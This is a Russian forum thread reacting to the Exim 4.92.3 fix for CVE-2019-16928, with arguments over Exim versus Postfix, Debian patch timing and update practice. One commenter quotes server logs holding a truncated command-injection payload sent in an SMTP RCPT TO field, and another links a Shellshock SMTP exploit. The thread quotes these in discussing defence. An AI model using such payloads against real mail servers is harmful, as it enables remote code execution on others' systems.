URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 118604
[ Назад ]

Исходное сообщение
"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."

Отправлено opennews , 29-Сен-19 21:03 
Опубликован экстренный выпуск почтового сервера Exim 4.92.3 с устранением очередной критической уязвимости (CVE-2019-16928), потенциально позволяющей удалённо выполнить свой код на сервере через передачу специально оформленной строки в команде EHLO. Уязвимость проявляется на стадии после сброса привилегий и ограничена выполнением кода с правами непривилегированного пользователя, под которым выполняется обработчик поступающих сообщений...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=51590


Содержание

Сообщения в этом обсуждении
"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено qqqqqq , 29-Сен-19 21:03 
Когда твой почтовый сервер состоит из уязвимостей чуть менее, чем целиком.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 15:00 
То это Exchange!

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Я , 30-Сен-19 17:40 
Как нам повезло что у нас postfix :)

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено InuYasha , 29-Сен-19 21:14 
Может, сайт Столлмана так и взломали?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 21:40 
Столлман сам себя взлом чтобы его пожалели.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 13:15 
> Может, сайт Столлмана так и взломали?

Нет, у FSF Exim 4.69, который слишком стар для этой дыры.
Там кто-то с легальными админскими полномочиями поработал, то есть, сотрудник FSF. Не все в FSF одобряют жёсткую позицию Столлмана по отношению к корпорациям и проприетарщине.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 01-Окт-19 16:10 
как завуалировано вы завернули простую фразу "нашлась крыса, возможно, за деньги"

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 29-Сен-19 21:20 
помню одному чудаку на букву М (тогдашний мой руководитель), я ещё в 2012-м говорил про дырявость Exim. а ведь в ту пору был чуть-ли не первый звоночек по этой теме. Саша, надеюсь ты до сих пор читаешь OpenNET и до сих пользуешься этой дырой, а заодно и ISPadmin без которого ты с почтовым сервером в жизни не умел работать. но ведь не менять же политику компании (то-есть твою политику) из-за какой-то там единичной дыры - так ты говорил? надеюсь и Dovecot ты до сих пор настроить не умеешь (число одновременных соединений), утверждая что де мол всё работало годами без всяких дополнительных настроек. я за полгода работы с тобой понял что это не лечится

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 10:02 
Игорь, ты? Помнишь меня? Я твой одноклассник. Я узнал тебя..

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 13:08 
https://cs6.pikabu.ru/images/big_size_comm/2015-08_1/1438553...

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено MooSE , 30-Сен-19 14:53 
Любой софт может содержать уязвимости. Если не ошибаюсь то время от времени в любом MTA находят дыры. И вопрос тут скорее не в выборе софта, а в том как быстро вы можете накатить патчи.

А вы рассуждаете немного по-детски. Извините если это вас ранит.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 15:35 
> Любой софт может содержать уязвимости. Если не ошибаюсь то время от времени в любом MTA находят дыры. И вопрос тут скорее не в выборе софта, а в том как быстро вы можете накатить патчи.

Вопрос скорее в том, как часто и насколько серьёзные дыры находят. В Exim только в этом годы нашли четыре remote code execution. Postfix и Sendmail явно не дотягивают до этого уровня дырявости.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 01-Окт-19 02:40 
Вот только sendmail уже не развивается. Вроде, лет 5 как помер. И дырки там не особо ищут, потому что пользуются реже чем в былые времена.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Я , 30-Сен-19 17:41 
Что-то не припоминаю наличие дыр у postfix, напомните?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено анон , 01-Окт-19 12:26 
https://vulners.com/exploitdb/EDB-ID:34896

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено uldus , 01-Окт-19 12:43 
Это эксплоит для уязвимости в Bash (https://www.opennet.ru/opennews/art.shtml?num=40667), а не в Postfix. Посмотретие приведённые там CVE, да и само название Shellshock SMTP Exploit об этом говорит.

Эксплоит лишь протестирован с postfix в связке с procmail. Ключевое слово здесь procmail, через который и эксплуатируется bash. Чистый Postfix не позволяет атаковать, если не испльзуются прослойки типа procmail.

При небольшой переработке этот эксплоит может быть использован с _любыми_ сервисами на системах с дырявым bash, которые выставляют переменные окружения, в том числе c OpenSSH, qmail, exim, openvpn и т.д.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено red75prim , 02-Окт-19 08:19 
Дык. Они там сишечку обрезали, zero-terminated строки повыдёргивали, огородили всякими safe API, разбили на кучу процессов, упростив тем управление памятью и улучшив надёжность. Вот. И почему только все так не пишут?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 30-Сен-19 21:17 
не ранит ничуть, иначе не писал бы публично. вопрос тут не в выборе софта и не в оперативности обновления. вопрос лишь в упёртости и лени, которой придумывают совершенно фантастические оправдания (политика компании). а упёртость на мой взгляд хороша лишь вкупе с осведомлённостью, но не с безграмотностью и ленью

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено dotgggff , 01-Окт-19 07:11 
женя? как ты был злбным * так и остался

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 01-Окт-19 13:52 
мимо. но я знал, реакция будет. задел довольно актуальный случай глупого упрямства со стороны руководства технического отдела против мнения специалиста

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено anonymousr , 01-Окт-19 08:42 
Незрелость как специалиста на лицо. Удачи на фрилансе!

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 01-Окт-19 14:04 
> Удачи на фрилансе!

если это мне - то никогда не занимался, но всё-равно спасибо

> Незрелость как специалиста на лицо

ты никогда не сталкивался с необразованным и безграмотным руководством (в данном случае технический директор), которое не имея конкретной работы, от скуки всюду суёт свой нос и норовит заявить о себе в любой сфере (от бух. учёта и до разработки веб-приложений) как о специалисте высшей категории? типа "вот вы тут все работаете, но я то выше вас всех вместе взятых - не забывайте об этом". столкнёшься и не раз, коль уж про фриланс заговорил


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 02-Окт-19 00:30 
Дружище, а из-за чего у тебя подгорает спустя столько лет? Не правильней ли отпустить его и жить своей жизнью?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 02-Окт-19 10:30 
> Дружище, а из-за чего у тебя подгорает спустя столько лет? Не правильней
> ли отпустить его и жить своей жизнью?

новость напомнила. выругался и живу дальше


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Michael Shigorin , 29-Сен-19 21:24 
#!

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 01:18 
Шигopинa спросить забыли.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено fske , 30-Сен-19 08:19 
Как бомбануло! Туши скорее!!!

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено zzz , 29-Сен-19 21:28 
>Проблема пока остаётся неисправленной в Debian

Дебиан - это надежно.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 29-Сен-19 22:32 
Exim4 не входит в базовую (начальную) установку Debian 10 (Buster). ну а после того как ты сам проделал "apt-get install exim4", ответственность за это рукоблудие уже всецело твоя. в Debian же на выбор преложены и Postfix и Sendmail и даже Qmail. спасение утопающих дело рук самих утопающих

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено zzz , 29-Сен-19 22:41 
Дистр, позиционирующий себя как стабильный для серьезного продакшна, одним из последних латает дыры, а виноват опять пользователь этого дистра? У вас там совсем шарики за ролики заехали? Убунтенок укусил?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено пох. , 29-Сен-19 22:52 
> Exim4 не входит в базовую (начальную) установку Debian 10

стесняюсь спросить - а какой mta в нее вообще входит-то? Аа, никакого, да?

Ну правильно, зачем всяким кроновским скриптам портить спокойный сон девляпса (и вообще они немодно, таймеры сцыстемды-то не нуждаются в почтовой системе).

> ну а после того как ты сам проделал "apt-get install exim4"

опубликуйте весь список пакетов, которые нельзя apt-get install в де6иллиане, чтобы не нарваться на неумение их майнтейнеров отслеживать обновления безопасности. Желательно с пруфами, что список исчерпывающий.

А то пока в этом списке 1. весь де6иллиан


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 13:02 
У девляпсов логи (включая таймеры сцыстемды) собираются в через ELK и анализируются prometheus exporter-ом, так что в случае чего в графане алерты загораются.
Так что да, из MTA нужен только postfix на 127.0.0.1, чтобы всякое легаси не обижалось.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 12:43 
> Exim4 не входит в базовую (начальную) установку Debian 10 (Buster).

С каких это пор?
https://wiki.debian.org/PkgExim4
> Exim is the MTA (Mail Transfer Agent) installed by default on new debian installations.

 


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 01:38 
А ты и поверил тому, что в новости написали? Мне утром 29-го исправление прилетело, и по ссылке написано, что в buster(security) fixed.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 12:56 
> Проблема пока остаётся неисправленной в Debian

https://www.debian.org/security/2019/dsa-4536
> Дата сообщения: 28.09.2019
> Ссылки на базы данных по безопасности: В каталоге Mitre CVE: CVE-2019-16928.

Поменьше верьте новостям, в них регулярно фигню пишут.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 15:00 
Перед обедом не читать опеннет?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 15:38 
Читать-то можно, почему бы и нет. А вот всерьёз воспринимать — не советую.
Действует то же правило, что и с прочими СМИ — если какой-то факт вызвал у вас возмущение, проверьте его по независимым источникам.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 22:49 
На момент публикации новости  в https://security-tracker.debian.org/tracker/CVE-2019-16928
Строка "buster (security)" была помечена как vulnerable

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 21:32 
Exim в критической инфраструктуре использовать нельзя.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 21:53 
EPEL (CentOS тоже)

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 12:57 
А мы центось используем, хаха. И ничего, живы пока.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 23:40 
Но попу свою лучше протрите.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 22:21 
*любой почтовый сервер

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено MS , 29-Сен-19 22:53 
ну что вы, что вы, не любой. Exchange - можно!


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Michael Shigorin , 29-Сен-19 23:15 
> ну что вы, что вы, не любой. Exchange - можно!

...спрятав за... за...


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено MS , 29-Сен-19 23:21 
за наш Exchange Online Protection, разумеется!


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено fske , 30-Сен-19 08:25 
Стесняюсь спросить, а что же перед Exchange Online Protection? Или приобрели стальные яйца?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено f , 30-Сен-19 12:11 
А что не так? А, эксчендж должен за экзимом работать.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено fske , 30-Сен-19 16:54 
решетo за решетoм? а ты юморист...

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Тот самый , 29-Сен-19 22:25 
> Exim в критической инфраструктуре использовать нельзя

Экий бред!

Следуя этой логике нельзя использовать openssl, openssh, mysql, postgres, postfix, etc. У всех были периоды, когда открывалась одна дыра за другой. Обновляться вовремя - это проблема?


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 29-Сен-19 22:39 
дыра за дырой в Postfix? да вы, голубчик, фантазёр. и что, всё сплошь remote code execution по типу как в Exim?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено zzz , 29-Сен-19 22:47 
Если в софте не находят дыры, значит этим софтом никто не пользуется. Более того, это не значит, что для этого софта нет приватных эксплоитов и что твой сервак не имеют, пока ты пышаешься отсутствием публичных CVE.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 29-Сен-19 22:53 
у тебя (как и у многих здесь) попросту бред преследования в виду отстутствия знаний и навыков. регулярно наблюдаю как подобные новости взрывают всей вашей секте мозг, и вы во все трубы рады трубить о каких-то несуществующих приватынх эксплойтах (приведи хоть какое-то доказательство!) и даже берётесь утверждать совсем уже несусветную чушь (Postfix никто не пользуется). сам то перечитай что пишешь хоть иногда, ну галиматья абсолютная

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено zzz , 29-Сен-19 23:07 
Забыл про уязвимость в RDP, эксплоит для которого год циркулировал из рук в руки? EternalBlue? И вообще всю ту пачку эксплоитов от АНБ? Зато гонору на десятерых.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 29-Сен-19 23:16 
что куришь и где покупаешь? очень уж кучеряво пишешь - начинаешь с сыра и заканичваешь луной. давай по порядку. новость про RCE-уязвимость в Exim - 4-ю за год. так? за последние 5-10 лет их было около 10. так? где хоть что-то подобное про Postfix? в RDP же дыр всегда было полно, найди и посчитай сам

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено zzz , 29-Сен-19 23:36 
А как сладко пел - несуществующие приватные эксплойты, бред преследования. Слив засчитан.

Далее, я про постфикс слова не сказал. Я сказал "Если в софте не находят дыры, значит этим софтом никто не пользуется". У тебя какие-то проблемы с самооценкой, что ты всё принимаешь на свой счет?

Идем дальше. За последний год в постгрессе было два RCE, в мускуле - ни одного. И что? Все должны дружно встать и сказать "Да ну этот постгри, перекатываемся на мускул!", потому что бублички ответственно заявляет - раз больше одной RCE, значит софт гно? К чему вообще эти патетичные фразы с известными всем цифрами?


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 30-Сен-19 00:07 
не пойму, к чему весь этот твой астрономических масштабов бред про чёрные дыры в далёких галактиках? давай всё-таки про Postfix. новость про дырявый Exim, ну а я сторониик Postfix. ты намекнул про приватные эксплойты. давай, разверни тему, срази меня фактами

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено zzz , 30-Сен-19 00:42 
Астанавись, ты несешь ахинею из-за постзнания. В прошлом, позапрошлом, позапозапрошлом RCE не были обнаружены, и всем всё было нормально, Exim - нормальный почтовик, никаких претензий. В этом году вышли RCE - и местные кукаретики прозрели: и код-то фуфло, и почтовик-то жуть какой небезопасный, и ваще надо срочнейше перекатываться на постфикс. Белки-истерички.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 30-Сен-19 00:48 
вот только первые RCE в нём были ещё так примерно в 2004-2006, именно тогда я от него отказался раз и навсегда. все остальные могли бы сделать то же самое. потому лишь сами виноваты

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено suffix , 30-Сен-19 08:45 
Честно говоря - надуманные ваши стенания. Ничего полохого за postfix не скажу, но что Вы так на exim-то накинулись ? Мне он удобнее - следишь за новостями - обновляешься вовремя - проблемы то в чём ?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено DIO , 30-Сен-19 11:06 
вообще стенания на тему чье кунгфу круче выглядят не оченнь. тем более когда ттак слабоаргументировано топят на постфикс. нет ни в экзиме ни в ппостфиксе ничего плохого. это тот случай когда выбирают запах тюльпанов - красных или фиолетвых :)
ИМХО: экзим хорош когда надо сильно выпендриваться, у постфикса в таком случае обычно надо делать либо бреинсторм либо "нестандартные решения".
Обычно постфикс (чаще) используют когда собрал и ничего не настраивая что-то работает, экзим обычно берут тогда когда надо что-то больше чем "просто чтобы почта ходила". Оба MTA хорошо работают с большой нагрузкой и когда ставится задача по выбору для решения высоконагруженой и/или "тяжелой" задачи то квалификация админа(-ов) обычно не мучит выбором, кроме того в списке для выбора почто-серверов появляются еще участники и главное что люди думают о схеме построения (речь о много серверов и отдельными серверами на смтп, отдельно на фильтра, отдбельно на поп3/имап и т.д.)

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 11:49 
Если postfix такой хороший то почему его не ставят?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено пох. , 29-Сен-19 22:55 
> Обновляться вовремя - это проблема?

в дистрибутивах, где майнтейнеры - ленивые рукожопы, selinux ни разу не предусмотрен, "зато у нас только шва6одный софт" - безусловно, проблема.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 13:12 
А в тех дистрибутивах, где мейнтейнеры не ленивые и selinux включают — юзеры регулярно бегают с криками "ааа, у меня непонятные баги, permission denied, хотя с правами и ACL всё нормально!!!1", а потом "как отключить это бл*ский selinux?"

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено пох. , 30-Сен-19 22:13 
тyпорылые "юзеры" и должны ведь - страдать?


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 30-Сен-19 23:26 
даже у них есть выбор:

- читать документацию и развиваться
- наслаждаться нескучными обоями Windows (MacOS, и т.д.)
- страдать и ежедневно ныть на OpenNET


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 22:39 
А какой почтовик норм?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Alexey , 29-Сен-19 22:53 
OpenSMTPD

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Alexey , 29-Сен-19 23:02 
кто минусует, тот - обоснуй!

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено почта россии , 29-Сен-19 22:53 
наш!

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Alexey , 29-Сен-19 23:03 
Эксчендж, что ль?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Анонес , 29-Сен-19 23:16 
ваш пакеты теряет

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено НяшМяш , 29-Сен-19 23:51 
Ладно пакеты, иногда целые отделения теряются. Понадобилось впервые за 5 лет получить пакет, а оказалось, что моё отделение уже 3 года на ремонт закрыто и надо тащиться за километр в другой район )

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Р , 30-Сен-19 08:31 
Это твоя карма,

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено почта россии , 30-Сен-19 09:52 
ну бывает - теряет, бывает дропает - как будто у вас не теряет.

И вообще, мущина, если так беспокоитесь - отправляйте первым классом с описью вложения, ПАКЕТ НЕ ЗАПЕЧАТЫВАЕМ!, или отойдите, не занимайте окошко.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено СеменСеменыч777 , 30-Сен-19 12:50 
отправления первого класса - обман народа. ничем не лучше заказных писем.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено почта россии , 30-Сен-19 14:34 
мущина, ПИСЬМО - это которое на бумаге пишут! А ваш гардероб в конверт не поместится! Да я вижу что он разобранный - НЕТ, все равно не войдет! И это не почтовый ящик, это мусорка! Ящик - воон там, да, в ту щель должно помещаться. А вам - воон в то окошко, оформляйте, не задерживайте очередь, не вы тут самый умный, мы вас таких по сто штук в день видим!


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 23:40 
Nodemailer и Haraka

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Alexey , 29-Сен-19 23:48 
пошутил? генетически ущербные мейлер и сервер с унаследованными дырами из лепрозория node.js?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 09:52 
зато не ломанут - кто ж в этой помойке полезет копаться? Ну будет еще немножечко майнить по выходным, тебе жалко?

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Ward , 30-Сен-19 00:26 
Binkd и binkleyforce ж

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено хотел спросить , 30-Сен-19 06:47 
Юзаю postfix + dovecot

Вроде неплохо...


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 19:27 
За файрволом

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 29-Сен-19 23:09 
Тю, так неинтересно. Зайду, думаю, обновлю - а там уже и так всё новое. Люблю unattended-upgrades :)
P.S. в Debian 10 фикс есть уже, если что.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено imho , 30-Сен-19 09:47 
Оказывается уже 2019-09-06 прилетало. В логах:

> SMTP protocol error in "AUTH CRAM-MD5" H=(mmmmbbbb…
> **** log string overflowed log buffer ****
> SMTP<< ehlo mmmmbbbb…
> **** debug string too long - truncated ****

PS. Версия подопытного старовата для данной ошибки, но он же не предупредил (версию не сообщает, редиска). Ага, а хост оказывается и ранее уже был замечен в «подобных шалостях»…
> SMTP<< RCPT TO:root+${run{\x2Fbin\x2Fbash


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 13:59 
RCPT TO это был shell eval прямым текстом, сейчас нужно заполнить буфер что уже не тривиально для макак.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 12:50 
Начиная с 4.90 у них завёлся шпион похоже который хочет дыру встроить, а её всё находят.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 13:58 
Погромист у них завелся без сишной специализации и прохождения сертификации.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено пох. , 30-Сен-19 14:30 
обычная макака у них завелась, дыра у нее под хвостом, и из нее как раз и вываливается такой код.

Вангую, что находят-то как раз 1/10 того что там на самом деле понагуанокожено.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 30-Сен-19 21:19 
И не говори, раньше такого не было: https://www.cvedetails.com/vulnerability-search.php?f=1&prod...

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Licha Morada , 30-Сен-19 21:29 
У нас (консалтинг и разработка в Мексике) Exim живёт на паре MX с CPanel, и серверах мониторинга с Debian. Последний месяц стало нескольно неуютно из-за этой плеяды дырок. Однако, что Debian, что CPanel, патчатся весьма оперативно.

Наша внутренняя документация не ахти какая прилизанная, но позволяет в течении нескольких секунд определить, на каких хостах установлен потенциально уязвимый пакет и оперативно пропатчить. В случае с CPanel же, к тому времени когда я туда поспеваю, оно всё уже само обновилось.


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено бублички , 30-Сен-19 23:33 
> позволяет в течении нескольких секунд определить, на каких хостах установлен потенциально уязвимый пакет и оперативно пропатчить

с простым скриптом apticron ты ещё и в свой почтовый ящик будешь получать эту информацию, так часто как настроишь (crontab). а если unattended-upgrades освоишь так вообще сможешь пить текилу круглый год


"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Licha Morada , 30-Сен-19 23:59 
Спасибо, но боюсь что с apticron'ом многовато почты получится. А unattended-upgrades в планах.
Несколько лет назад, когда я повадился обновления на OS накатывать без взаимодействия с прикладниками, они очень ругались что новые версии библиотек им продукт ломают. А с взаимодействием, тогда получалось долго и дорого.
Сейчас времена изменились, мы много чего стандартизировали, и автоматизация ведёт себя более предсказуемо.

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 01-Окт-19 02:00 
https://koji.fedoraproject.org/koji/packageinfo?packageID=1694

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Отправлено Аноним , 02-Окт-19 03:08 
el7: yum update --enablerepo=epel-testing exim
el6: yum update exim